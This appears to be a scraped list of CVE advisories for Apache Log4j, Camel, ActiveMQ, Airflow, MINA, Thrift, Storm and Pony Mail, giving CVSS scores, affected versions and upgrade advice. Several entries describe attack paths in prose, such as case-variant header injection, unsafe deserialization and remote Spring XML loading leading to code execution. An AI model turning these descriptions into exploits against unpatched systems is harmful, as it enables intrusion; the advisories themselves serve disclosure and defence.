CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache log4j 3.0.0
apache log4j *
CVE-2026-34480

Apache Log4j Core's XmlLayout https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout , in versions up to and including 2.25.3, fails to sanitize characters forbidden by the XML 1.0 specification https://www.w3.org/TR/xml/#charsets producing invalid XML output whenever a log message or MDC value contains such characters. The impact depends on the StAX implementation in use: * JRE built-in StAX: Forbidden characters are silently written to the output, producing malformed XML. Conforming parsers must reject such documents with a fatal error, which may cause downstream log-processing systems to drop the affected records. * Alternative StAX implementations (e.g., Woodstox https://github.com/FasterXML/woodstox , a transitive dependency of the Jackson XML Dataformat module): An exception is thrown during the logging call, and the log event is never delivered to its intended appender, only to Log4j's internal status logger. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue by sanitizing forbidden characters before XML output.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache log4j 3.0.0
apache log4j *
CVE-2026-34481

Apache Log4j's JsonTemplateLayout https://logging.apache.org/log4j/2.x/manual/json-template-layout.html , in versions up to and including 2.25.3, produces invalid JSON output when log events contain non-finite floating-point values (NaN, Infinity, or -Infinity), which are prohibited by RFC 8259. This may cause downstream log processing systems to reject or fail to index affected records. An attacker can exploit this issue only if both of the following conditions are met: * The application uses JsonTemplateLayout. * The application logs a MapMessage containing an attacker-controlled floating-point value. Users are advised to upgrade to Apache Log4j JSON Template Layout 2.25.4, which corrects this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache log4j 3.0.0
apache log4j *
CVE-2026-38743

The authenticated /ui/dags endpoint did not enforce per-DAG access control on embedded Human-in-the-Loop (HITL) and TaskInstance records: a logged-in Airflow user with read access to at least one DAG could retrieve HITL prompts (including their request parameters) and full TaskInstance details for DAGs outside their authorized scope. Because HITL prompts and TaskInstance fields routinely carry operator parameters and free-form context attached to a task, the leak widens visibility of DAG-run data beyond the intended per-DAG RBAC boundary for every authenticated user. Users are recommended to upgrade to version 3.2.1 , which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-40022

When authentication is enabled on the Apache Camel embedded HTTP server or embedded management server (camel-platform-http-main) and a non-root context path such as /api or /admin is configured via camel.server.path or camel.management.path, the BasicAuthenticationConfigurer and JWTAuthenticationConfigurer classes derive the authentication path from properties.getPath() when camel.server.authenticationPath / camel.management.authenticationPath is not explicitly set. Combined with the Vert.x sub-router mounting model - the sub-router is mounted at _path_* and the authentication handler is registered inside the sub-router at the resolved path - this causes the authentication handler to match only the exact configured context path, not its subpaths. Unauthenticated requests to subpaths such as /api/_route_ or /admin/observe/info therefore reach protected business routes and management endpoints without being challenged for credentials. The /observe/info endpoint can disclose runtime metadata such as the user, working directory, home directory, process ID, JVM and operating system information. This issue affects Apache Camel: from 4.14.1 before 4.14.6, from 4.18.0 before 4.18.2. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, they are suggested to upgrade to 4.14.6. If users are on the 4.18.x LTS releases stream, they are suggested to upgrade to 4.18.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N 3.9 4.2

Products Affected

Vendor Product Version
apache camel *
CVE-2026-40048

The Camel-PQC FileBasedKeyLifecycleManager class deserializes the contents of `<keyId>.key` files in the configured key directory using java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. The cast to `java.security.KeyPair` is evaluated only after `readObject()` has already returned, so any `readObject()` side effects in the deserialized object run before the type check. An attacker who can write to the key directory used by a Camel application — for example through a path traversal into the directory, misconfigured filesystem permissions on the volume where keys are stored, a compromised key provisioning pipeline, or a symlink attack — can place a crafted serialized Java object that, when deserialized during normal key lifecycle operations, results in arbitrary code execution in the context of the application. This issue affects Apache Camel: from 4.19.0 before 4.20.0, from 4.18.0 before 4.18.2. Users are recommended to upgrade to version 4.20.0, which fixes the issue by replacing java.io.ObjectInputStream-based key and metadata storage with standard PKCS#8 (private key) / X.509 SubjectPublicKeyInfo (public key) Base64 JSON encoding. For users on the 4.18.x LTS releases stream, upgrade to 4.18.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

Products Affected

Vendor Product Version
apache camel 4.19.0
apache camel *
CVE-2026-40453

The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy so that case-variant header names such as 'CAmelExecCommandExecutable' are filtered out alongside 'CamelExecCommandExecutable'. The same setLowerCase(true) call was not applied to five non-HTTP HeaderFilterStrategy implementations: JmsHeaderFilterStrategy and ClassicJmsHeaderFilterStrategy in camel-jms, SjmsHeaderFilterStrategy in camel-sjms, CoAPHeaderFilterStrategy in camel-coap, and GooglePubsubHeaderFilterStrategy in camel-google-pubsub. Because those strategies use case-sensitive String.startsWith('Camel'/'camel') filtering while the Camel Exchange stores headers in a case-insensitive map, an attacker with JMS (or equivalent) producer access to the broker consumed by a Camel route can inject case-variant Camel internal headers, which are then resolved by downstream components such as camel-exec and camel-file using their canonical casing. This enables remote code execution and arbitrary file write on routes that forward JMS messages to header-driven components. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.9 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 3.1 6.0

Products Affected

Vendor Product Version
apache camel 4.19.0
apache camel *
CVE-2026-40466

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ. An authenticated attacker may bypass the fix in CVE-2026-34197 by adding a connector using an HTTP Discovery transport via BrokerView.addNetworkConnector or BrokerView.addConnector through Jolokia if the activemq-http module is on the classpath. A malicious HTTP endpoint can return a VM transport through the HTTP URI which will bypass the validation added in CVE-2026-34197. The attacker can then use the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.6, from 6.0.0 before 6.2.5; Apache ActiveMQ All: before 5.19.6, from 6.0.0 before 6.2.5; Apache ActiveMQ: before 5.19.6, from 6.0.0 before 6.2.5. Users are recommended to upgrade to version 5.19.6 or 6.2.5, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache activemq *
apache activemq_broker *
CVE-2026-40473

The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter wraps an IoBuffer in a java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. When a Camel route uses camel-mina as a TCP or UDP consumer and requests conversion to ObjectInput (for example via getBody(ObjectInput.class) or @Body ObjectInput), an attacker sending a crafted serialized Java object over the network to the MINA consumer port can trigger arbitrary code execution in the context of the application during readObject(). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache camel 4.19.0
apache camel *
CVE-2026-40690

The asset dependency graph did not restrict nodes by the viewer's DAG read permissions: a user with read access to at least one DAG could browse the asset graph for any other asset in the deployment and learn the existence and names of DAGs and assets outside their authorized scope. Users are recommended to upgrade to version 3.2.1, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-40858

The camel-infinispan component's ProtoStream-based remote aggregation repository deserializes data read from a remote Infinispan cache using java.io.ObjectInputStream without applying any ObjectInputFilter. An attacker who can write to the Infinispan cache used by a Camel application can inject a crafted serialized Java object that, when read during normal aggregation repository operations such as get or recover, results in arbitrary code execution in the context of the application. This issue affects Apache Camel: from 4.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2. The JIRA ticket: https://issues.apache.org/jira/browse/CAMEL-23322 refers to the various commits that resolved the issue, and have more details. This issue follows the same class of vulnerability previously addressed in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache camel 4.19.0
apache camel *
CVE-2026-40860

JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class allowlist or class denylist. Because this code path is reached whenever the mapJmsMessage option is enabled (the default) and Camel acts as a JMS consumer, an attacker able to publish a crafted ObjectMessage to a queue or topic consumed by a Camel application could achieve remote code execution when a deserialization gadget chain was present on the classpath. The same handling was reached transitively through camel-sjms2 (whose Sjms2Endpoint extends SjmsEndpoint) and through camel-amqp (whose AMQPJmsBinding extends JmsBinding), and by other JMS-family components built on JmsComponent such as camel-activemq and camel-activemq6. This issue affects Apache Camel: from 3.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache camel 4.19.0
apache camel *
CVE-2026-41043

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache ActiveMQ, Apache ActiveMQ Web. An authenticated attacker can show malicious content when browsing queues in the web console by overriding the content type to be HTML (instead of XML) and by injecting HTML into a JMS selector field. This issue affects Apache ActiveMQ: before 5.19.6, from 6.0.0 before 6.2.5; Apache ActiveMQ Web: before 5.19.6, from 6.0.0 before 6.2.5. Users are recommended to upgrade to version 6.2.5 or 5.19.6, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache activemq *
apache activemq_web *
CVE-2026-41044

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ, Apache ActiveMQ Broker, Apache ActiveMQ All. An authenticated attacker can use the admin web console page to construct a malicious broker name that bypasses name validation to include an xbean binding that can be later used by a VM transport to load a remote Spring XML application. The attacker can then use the DestinationView mbean to send a message to trigger a VM transport creation that will reference this malicious broker name which can lead to loading the malicious Spring XML context file. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ: before 5.19.6, from 6.0.0 before 6.2.5; Apache ActiveMQ Broker: before 5.19.6, from 6.0.0 before 6.2.5; Apache ActiveMQ All: before 5.19.6, from 6.0.0 before 6.2.5. Users are recommended to upgrade to version 6.2.5 or 5.19.6, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache activemq *
apache activemq_broker *
CVE-2026-41081

Improper Handling of TLS Client Authentication Failure Leading to Anonymous Principal Assignment in Apache Storm Versions Affected: up to 2.8.7 Description: When TLS transport is enabled in Apache Storm without requiring client certificate authentication (the default configuration), the TlsTransportPlugin assigns a fallback principal (CN=ANONYMOUS) if no client certificate is presented or if certificate verification fails. The underlying SSLPeerUnverifiedException is caught and suppressed rather than rejecting the connection. This fail-open behavior means an unauthenticated client can establish a TLS connection and receive a valid principal identity. If the configured authorizer (e.g., SimpleACLAuthorizer) does not explicitly deny access to CN=ANONYMOUS, this may result in unauthorized access to Storm services. The condition is logged at debug level only, reducing visibility in production. Impact: Unauthenticated clients may be assigned a principal identity, potentially bypassing authorization in permissive or misconfigured environments. Mitigation: Users should upgrade to 2.8.7 in which TLS authentication failures are handled in a fail-closed manner. Users who cannot upgrade immediately should: - Enable mandatory client certificate authentication (nimbus.thrift.tls.client.auth.required: true) - Ensure authorization rules explicitly deny access to CN=ANONYMOUS - Review all ACL configurations for implicit default-allow behavior

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache storm *
CVE-2026-41409

The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late after a static initializer in a class to be read might already have been executed. Affected versions are Apache MINA 2.0.0 <= 2.0.27, 2.1.0 <= 2.1.10, and 2.2.0 <= 2.2.5. The problem is resolved in Apache MINA 2.0.28, 2.1.11, and 2.2.6 by applying the classname allowlist earlier. Affected are applications using Apache MINA that call IoBuffer.getObject(). Applications using Apache MINA are advised to upgrade

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache mina *
CVE-2026-41602

Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache thrift *
CVE-2026-41603

Improper Validation of Certificate with Host Mismatch vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 2.2 5.2

Products Affected

Vendor Product Version
apache thrift *
CVE-2026-41604

Out-of-bounds Read vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H 3.9 4.2

Products Affected

Vendor Product Version
apache thrift *
CVE-2026-41605

Integer Overflow or Wraparound vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

Products Affected

Vendor Product Version
apache thrift *
CVE-2026-41606

Uncontrolled Recursion vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4

Products Affected

Vendor Product Version
apache thrift *
CVE-2026-41607

Out-of-bounds Read vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L 3.9 2.5

Products Affected

Vendor Product Version
apache thrift *
CVE-2026-41635

Apache MINA's AbstractIoBuffer.resolveClass() contains two branches, one of them (for static classes or primitive types) does not check the class at all, bypassing the classname allowlist and allowing arbitrary code to be executed. The fix checks if the class is present in the accepted class filter before calling Class.forName().  Affected versions are Apache MINA 2.0.0 <= 2.0.27, 2.1.0 <= 2.1.10, and 2.2.0 <= 2.2.5. The problem is resolved in Apache MINA 2.0.28, 2.1.11, and 2.2.6 by applying the classname allowlist earlier. Affected are applications using Apache MINA that call  IoBuffer.getObject(). Applications using Apache MINA are advised to upgrade.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache mina *
CVE-2026-41636

Uncontrolled Recursion vulnerability in Apache Thrift Node.js bindings This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache thrift *
CVE-2026-41873

** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover. This issue affects all versions of the Lua implementation of Pony Mail. There is a Python implementation under development under the name "Pony Mail Foal" that is not affected by this issue, but hasn't been released yet. As the Lua implementation of this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache pony_mail *